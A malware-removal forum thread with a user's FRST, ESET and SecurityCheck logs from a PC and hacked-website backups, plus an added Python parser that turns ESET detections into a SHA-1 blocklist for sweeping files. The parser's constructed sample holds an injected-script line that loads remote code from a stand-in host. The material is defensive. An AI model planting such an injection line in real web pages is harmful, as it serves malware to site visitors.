2013-12-28 11:55 - 2012-08-20 08:55 - 00104960 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00090112 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00030720 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2011-12-31 09:20 - 00225920 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2013-12-28 11:55 - 2010-10-08 16:59 - 00032768 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2013-12-28 11:55 - 2010-09-26 18:09 - 00022016 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwupgrade.sys
2013-12-28 11:55 - 2010-08-06 07:43 - 01001472 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2013-12-28 11:55 - 2010-07-27 09:52 - 00117248 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2013-12-28 11:53 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-23 08:35 - 2013-12-23 08:36 - 14335560 _____ C:\Users\*****\Downloads\flags.zip
2013-12-17 12:17 - 2013-12-17 12:21 - 103312806 _____ C:\Users\*****\Downloads\d012f60a.sql
2013-12-17 12:12 - 2013-12-17 12:12 - 00108255 _____ C:\Users\*****\Downloads\Open_Graph_Protocol_v2.6_j25_unzipfirst.zip
2013-12-17 11:41 - 2013-12-17 12:07 - 00000000 ____D C:\Users\*****\Desktop\mp3

==================== One Month Modified Files and Folders =======

2014-01-15 11:45 - 2014-01-15 11:45 - 00001206 _____ C:\Users\*****\Desktop\JRT.txt
2014-01-15 11:39 - 2014-01-15 11:39 - 00000000 ____D C:\Windows\ERUNT
2014-01-15 11:39 - 2010-12-11 20:50 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-01-15 11:13 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-01-15 11:13 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-01-15 11:07 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Dropbox
2014-01-15 11:06 - 2010-12-11 20:50 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-01-15 11:05 - 2010-07-28 14:27 - 00000000 ____D C:\ProgramData\NVIDIA
2014-01-15 11:05 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2014-01-15 11:05 - 2009-07-14 05:51 - 00137925 _____ C:\Windows\setupact.log
2014-01-15 11:04 - 2014-01-15 10:47 - 00000000 ____D C:\AdwCleaner
2014-01-15 11:04 - 2010-07-28 14:21 - 01607546 _____ C:\Windows\WindowsUpdate.log
2014-01-15 10:38 - 2014-01-15 10:38 - 00001688 _____ C:\Users\*****\Desktop\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx tro.txt
2014-01-15 10:35 - 2014-01-15 10:35 - 01236282 _____ C:\Users\*****\Downloads\adwcleaner.exe
2014-01-15 10:35 - 2014-01-15 10:35 - 01037068 _____ (Thisisu) C:\Users\*****\Downloads\JRT.exe
2014-01-15 10:34 - 2014-01-15 10:34 - 00448512 _____ (OldTimer Tools) C:\Users\*****\Downloads\TFC.exe
2014-01-15 09:39 - 2011-07-14 17:04 - 00000000 ___RD C:\Users\*****\Dropbox
2014-01-15 09:37 - 2009-11-18 23:09 - 00812466 _____ C:\Windows\PFRO.log
2014-01-15 09:05 - 2014-01-15 09:05 - 00001113 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-01-15 09:05 - 2014-01-15 09:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-15 09:05 - 2014-01-15 09:04 - 10285040 _____ (Malwarebytes Corporation                                    ) C:\Users\*****\Downloads\mbam-setup-1.75.0.1300.exe
2014-01-15 08:46 - 2014-01-15 08:45 - 00377856 _____ C:\Users\*****\Downloads\gmer_2.1.19163.exe
2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:44 - 2014-01-15 08:43 - 02076160 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:42 - 2010-12-11 20:34 - 00000000 ____D C:\Users\*****
2014-01-15 08:41 - 2014-01-15 08:41 - 00050477 _____ C:\Users\*****\Downloads\Defogger.exe
2014-01-14 19:07 - 2010-07-26 14:08 - 00700380 _____ C:\Windows\system32\perfh007.dat
2014-01-14 19:07 - 2010-07-26 14:08 - 00149176 _____ C:\Windows\system32\perfc007.dat
2014-01-14 19:07 - 2009-07-14 06:13 - 01622100 _____ C:\Windows\system32\PerfStringBackup.INI
2014-01-14 18:58 - 2010-12-20 12:28 - 00000000 ____D C:\Users\*****\AppData\Roaming\gSyncit
2014-01-14 18:54 - 2014-01-14 18:26 - 625348608 _____ C:\Users\*****\Downloads\rescue-system.iso
2014-01-14 18:50 - 2014-01-14 18:40 - 121822819 _____ C:\Users\*****\Downloads\avg_arl_ffi_all_120_130801a6481.rar
2014-01-14 18:44 - 2014-01-14 18:44 - 00002952 _____ C:\Users\*****\Downloads\access_log_2013-11-12.gz
2014-01-14 18:42 - 2014-01-14 18:42 - 00002316 _____ C:\Users\*****\Downloads\access_log_2014-01-05.gz
2014-01-14 18:38 - 2014-01-14 18:15 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 18:35 - 2014-01-14 18:28 - 112001024 _____ C:\Users\*****\Downloads\avg_arl_cdi_all_120_130801a6481.iso
2014-01-14 18:16 - 2010-12-18 20:23 - 00000000 ____D C:\Users\*****\AppData\Roaming\FileZilla
2014-01-14 18:09 - 2014-01-14 18:09 - 05063616 _____ (PortableApps.com) C:\Users\*****\Downloads\FileZillaPortable_3.7.3.paf.exe
2014-01-14 17:08 - 2011-01-06 16:46 - 00269936 _____ C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-14 15:32 - 2013-10-19 19:14 - 00000557 _____ C:\Users\*****\Desktop\moooooovie.txt
2014-01-14 15:11 - 2014-01-14 15:11 - 00378099 _____ C:\Users\*****\Downloads\10_246_16_68.sql
2014-01-14 11:04 - 2014-01-14 11:03 - 00000000 ____D C:\Users\*****\Desktop\templates_c
2014-01-13 16:38 - 2013-12-04 17:50 - 00000053 _____ C:\Users\*****\Downloads\google63a169ac443c121d.html
2014-01-13 16:31 - 2014-01-13 16:31 - 01790152 _____ C:\Users\*****\Downloads\com_phocagallery_v3.2.6(1).zip
2014-01-13 15:14 - 2014-01-13 15:13 - 04914782 _____ C:\Users\*****\Downloads\Palettenparade 13  Einladung.zip
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-13 06:48 - 2009-07-14 05:45 - 01348600 _____ C:\Windows\system32\FNTCACHE.DAT
2014-01-12 17:57 - 2013-11-29 20:15 - 00002356 _____ C:\Users\*****\Desktop\kauuuuuuf.txt
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-12 10:56 - 2014-01-12 10:56 - 00028736 _____ C:\Users\*****\Downloads\12_01_2014_WebFTP.zip
2014-01-12 09:24 - 2010-12-11 20:34 - 00269936 _____ C:\Users\*****\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-12 09:20 - 2014-01-12 09:20 - 00119546 _____ C:\Users\*****\Downloads\droid-serif.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00079700 _____ C:\Users\*****\Downloads\droid-sans-mono.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00011194 _____ C:\Users\*****\Downloads\Droid.zip
2014-01-12 09:19 - 2014-01-12 09:19 - 00211015 _____ C:\Users\*****\Downloads\Droid-Sans.zip
2014-01-11 20:33 - 2014-01-11 20:32 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 16:38 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2014-01-10 11:14 - 2009-07-14 03:34 - 00000531 _____ C:\Windows\win.ini
2014-01-10 10:58 - 2014-01-10 10:58 - 00036115 _____ C:\Users\*****\Downloads\access-2014010821-2014011002.log.gz
2014-01-09 07:10 - 2012-02-07 11:46 - 00001506 _____ C:\Windows\wininit.ini
2014-01-09 07:10 - 2011-07-14 17:04 - 00001025 _____ C:\Users\*****\Desktop\Dropbox.lnk
2014-01-09 07:10 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-01-09 07:10 - 2010-12-11 20:35 - 00000000 ___RD C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-01-08 11:52 - 2014-01-08 11:52 - 00002371 _____ C:\Users\*****\Downloads\address.zip
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2014-01-08 11:13 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:15 - 2013-12-09 14:27 - 00001153 _____ C:\Users\Public\Desktop\FlippingBook Publisher Professional.lnk
2014-01-08 11:14 - 2013-12-09 14:25 - 00000000 __HDC C:\ProgramData\{CA331EC7-0458-49DF-8B26-9E171A9EAE0D}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-05 16:21 - 2011-01-03 16:37 - 00000000 ____D C:\Users\*****\AppData\Roaming\Azureus
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-04 16:21 - 2013-12-12 14:55 - 00000000 ____D C:\Users\*****\Desktop\löschen_____
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-30 20:16 - 2013-12-30 20:11 - 176752984 _____ (VMware, Inc.                                                   ) C:\Users\*****\Downloads\VMware-converter-en-5.5.0-1362012.exe
2013-12-30 08:58 - 2013-12-30 08:54 - 98508144 _____ (VMware, Inc.) C:\Users\*****\Downloads\VMware-player-6.0.1-1379776.exe
2013-12-30 08:35 - 2013-12-30 08:35 - 00409141 _____ C:\Users\*****\Downloads\torbutton146-current.zip
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-29 11:24 - 2013-12-29 11:22 - 81699167 _____ (Stellarium team                                             ) C:\Users\*****\Downloads\stellarium-0.12.4-win64.exe
2013-12-28 16:39 - 2013-09-01 18:06 - 00000000 ____D C:\Users\Admin\Desktop\test
2013-12-28 16:39 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Mozilla
2013-12-28 16:36 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Local\Mozilla
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:57 - 2013-12-28 11:56 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:57 - 2013-12-28 11:53 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-26 18:07 - 2013-09-26 18:33 - 00000000 ____D C:\Users\*****\Desktop\Stadtkrug Dropbox Lager brennen
2013-12-23 08:36 - 2013-12-23 08:35 - 14335560 _____ C:\Users\*****\Downloads\flags.zip
2013-12-22 12:18 - 2013-12-08 11:17 - 00001094 _____ C:\Users\Public\Desktop\TeamViewer 9.lnk
2013-12-19 11:41 - 2009-11-18 22:56 - 00000000 ____D C:\Program Files (x86)\Google
2013-12-17 20:00 - 2010-12-11 20:47 - 00000000 ____D C:\Users\*****\AppData\Roaming\Adobe
2013-12-17 12:21 - 2013-12-17 12:17 - 103312806 _____ C:\Users\*****\Downloads\d012f60a.sql
2013-12-17 12:12 - 2013-12-17 12:12 - 00108255 _____ C:\Users\*****\Downloads\Open_Graph_Protocol_v2.6_j25_unzipfirst.zip
2013-12-17 12:07 - 2013-12-17 11:41 - 00000000 ____D C:\Users\*****\Desktop\mp3
2013-12-16 09:17 - 2010-12-25 15:48 - 00001998 ____H C:\Users\*****\Documents\Default.rdp

Some content of TEMP:
====================
C:\Users\*****\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-01-09 07:35

==================== End Of Log ============================
         
16.01.2014, 08:36   #4
schrauber
/// the machine
/// TB-Ausbilder

ESET Online Scanner

  • You can find an illustrated guide to ESET Online Scanner here
  • Download and start Eset Online Scanner
  • Tick Yes, I accept the Terms of Use and click Start.
  • Enable "Detection of potentially unwanted applications" and choose the following settings.
  • Click Start.
  • The signatures are downloaded and the scan starts automatically.
  • When the scan has finished, click Finish.
  • Close the ESET window.
  • Open Explorer.
  • Locate C:\Programme\Eset\EsetOnlineScanner\log.txt (on 64-bit also C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) and open it with your text editor (illustrated).
  • Post the logfile here.
  • Uninstall: Control Panel => Software / Uninstall a program => remove Eset Online Scanner V3.
  • Manually delete the following folder and empty the Recycle Bin => C:\Programme\Eset


Please download SecurityCheck and:

  • Save it to the desktop.
  • Start SecurityCheck.exe and follow the instructions in the DOS box.
  • When the scan has finished, a text document (checkup.txt) should open.
Please post its contents here.

And a fresh FRST log, please. Any problems left?
__________________
regards,
schrauber

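
Schrauber asks for ESET Online Scanner's log.txt to be posted. That file has two line shapes: per-run summary lines of the form `# key=value` (engine, `end=stopped` or `end=finished`, `scanned`, `found`, `cleaned`) and one line per detection of the form `sh=<SHA-1> ft=.. fh=.. vn="<detection name>" ac=<action> fn="<path>"`. The parser below is an added example, not ESET's or Trojaner-Board's code. It separates runs that finished from runs that were stopped early, and reuses the SHA-1 values of the detections as a blocklist to sweep another directory (a website backup, another host) for identical copies. The sample log text, the stand-in script and its SHA-1 are constructed for this example, not taken from the thread.

```python
"""Parse ESET Online Scanner's log.txt and reuse its SHA-1 hits to sweep other copies.

Added example, not ESET's or Trojaner-Board's code. Only the two line shapes
seen in such a log are handled: '# key=value' summary lines and
'sh=<sha1> ft=.. fh=.. vn="<name>" ac=<action> fn="<path>"' detection lines.
SAMPLE_LOG, INJECTED_JS and the backup tree in demo() are constructed.
"""
import hashlib
import os
import re
import tempfile

# key=value pairs; values are either a double-quoted string (may contain spaces) or a bare token.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_eset_log(text):
    """Return (runs, detections). A new run starts at every '# version=' line, so a
    log.txt that accumulated several scans yields several summary dicts."""
    runs, detections = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("# "):
            key, _, value = line[2:].partition("=")
            if key == "version":
                runs.append({})
            if runs:
                runs[-1][key] = value
        elif line.startswith("sh="):
            detections.append({k: v.strip('"') for k, v in FIELD_RE.findall(line)})
        # ESETSmartInstaller status lines and anything else are ignored.
    return runs, detections


def run_is_trustworthy(run):
    """Only a run with end=finished covered the whole scan set; end=stopped is partial."""
    return run.get("end") == "finished"


def sha1_blocklist(detections):
    """Map lower-case SHA-1 -> detection name, for sweeping backups or other hosts."""
    return {d["sh"].lower(): d["vn"] for d in detections if "sh" in d and "vn" in d}


def sweep(root, blocklist):
    """Hash every file under root; return {relative path: detection name} for blocklist hits."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            h = hashlib.sha1()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 20), b""):
                    h.update(chunk)
            digest = h.hexdigest()
            if digest in blocklist:
                hits[os.path.relpath(path, root)] = blocklist[digest]
    return hits


# Constructed stand-in for an injected script; its SHA-1 is computed here, not taken from the thread.
INJECTED_JS = b"document.write(unescape('%3Cscript src=%22//example.invalid/x.js%22%3E%3C/script%3E'));\n"
INJECTED_SHA1 = hashlib.sha1(INJECTED_JS).hexdigest().upper()

SAMPLE_LOG = f"""# version=8
# end=stopped
# found=0
# cleaned=0
# version=8
# end=finished
# remove_checked=false
# scanned=2656904
# found=1
# cleaned=0
sh={INJECTED_SHA1} ft=0 fh=0000000000000000 vn="JS/TrojanDownloader.Agent.NSA trojan" ac=I fn="G:\\web 2013\\cgi-bin\\newgeocheck.js"
"""


def demo():
    """Parse the constructed log, then sweep a constructed backup tree for the same hash."""
    runs, detections = parse_eset_log(SAMPLE_LOG)
    blocklist = sha1_blocklist(detections)
    with tempfile.TemporaryDirectory() as backup:
        os.makedirs(os.path.join(backup, "web 2012", "cgi-bin"))
        with open(os.path.join(backup, "web 2012", "cgi-bin", "geocheck.js"), "wb") as f:
            f.write(INJECTED_JS)  # same bytes under a different name: should be found
        with open(os.path.join(backup, "index.html"), "wb") as f:
            f.write(b"<html>clean</html>")  # should not be found
        hits = sweep(backup, blocklist)
    return {
        "completed_runs": [run_is_trustworthy(r) for r in runs],
        "found": int(runs[-1]["found"]),
        "cleaned": int(runs[-1]["cleaned"]),
        "detections": detections,
        "hits": hits,
    }


if __name__ == "__main__":
    print(demo())
```

Read the summary before the detections: `remove_checked=false` means the scanner only reported, so `cleaned` stays at 0 regardless of `found`, and a run with `end=stopped` tells you nothing about the files it never reached. A SHA-1 match only proves an identical copy; a re-obfuscated or slightly edited injection will not match, so the sweep is triage for a known bad file, not a substitute for reviewing the web code itself.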

17.01.2014, 08:00   #5
franz12

Thanks! Everything is running without problems. The only worry left is whether someone might still be on the PC. Here are the logs:

ESET
Code:
ATTFilter
ESETSmartInstaller@High as downloader log:
Can not open internetESETSmartInstaller@High as downloader log:
Can not open internetCan not open internetESETSmartInstaller@High as downloader log:
Can not open internetCan not open internetESETSmartInstaller@High as downloader log:
Can not open internet# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=f1b14229420287489037af2480ce8a99
# engine=16673
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-01-16 11:39:05
# local_time=2014-01-16 12:39:05 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=5893 16776574 100 94 16350873 141502195 0 0
# scanned=260275
# found=0
# cleaned=0
# scan_time=6114
ESETSmartInstaller@High as downloader log:
all ok
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.6920
# api_version=3.0.2
# EOSSerial=f1b14229420287489037af2480ce8a99
# engine=16682
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=false
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2014-01-17 05:02:55
# local_time=2014-01-17 06:02:55 (+0100, Mitteleuropäische Zeit)
# country="Germany"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=5893 16776574 100 94 16413503 141564825 0 0
# scanned=2656904
# found=105
# cleaned=0
# scan_time=35198

Only JS/TrojanDownloader.Agent.NSA trojan was found, in the backup files of the hacked websites (.js). But I already knew about that. I deleted those lines because too many names appear in them.

sh=CB96C5E165BF209BE876FAD98C7E828D29395F0B ft=0 fh=0000000000000000 vn="JS/TrojanDownloader.Agent.NSA trojan" ac=I fn="G:\****\web 2013\cgi-bin\newgeocheck.js"

etc. ...
         
SecurityCheck
Code:
ATTFilter
 Results of screen317's Security Check version 0.99.78  
 Windows 7 Service Pack 1 x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
Microsoft Security Essentials   
  (On Access scanning disabled!) 
 Error obtaining update status for antivirus!  
`````````Anti-malware/Other Utilities Check:````````` 
 Thumbnail Generator by Disable Spyware 
 Malwarebytes Anti-Malware Version 1.75.0.1300  
 Java 7 Update 45  
 Adobe Flash Player 11.9.900.170  
 Adobe Reader XI  
 Mozilla Firefox (26.0) 
 Mozilla Thunderbird (3.1.9) Thunderbird out of Date!  
 Google Chrome 31.0.1650.63  
 Google Chrome 32.0.1700.76  
````````Process Check: objlist.exe by Laurent````````  
 Microsoft Security Essentials MSMpEng.exe 
 Microsoft Security Essentials msseces.exe 
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbamgui.exe  
 Malwarebytes' Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  
````````````````````End of Log``````````````````````
         
FRST

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-01-2014
Ran by ***** (administrator) on *****-PC on 17-01-2014 07:40:47
Running from G:\Users\*****\Documents\*****\Hacker 2014 01\trojaner-board.de
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements Organizer 8.0\PhotoshopElementsFileAgent.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\avmike.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\certsrv.exe
(Devguru Co., Ltd.) C:\Windows\SysWOW64\dgdersvc.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\esClient.exe
() C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe
() C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe
() C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
(Acer) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
() C:\OEM\USBDECTION\USBS3S4Detection.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSConnector.exe
(Firebird Project) C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Microsoft Corporation) C:\Windows\vVX1000.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
() C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe
(CyberLink Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe
(Acer Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe
(Adobe Sytems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe
(Google) C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe
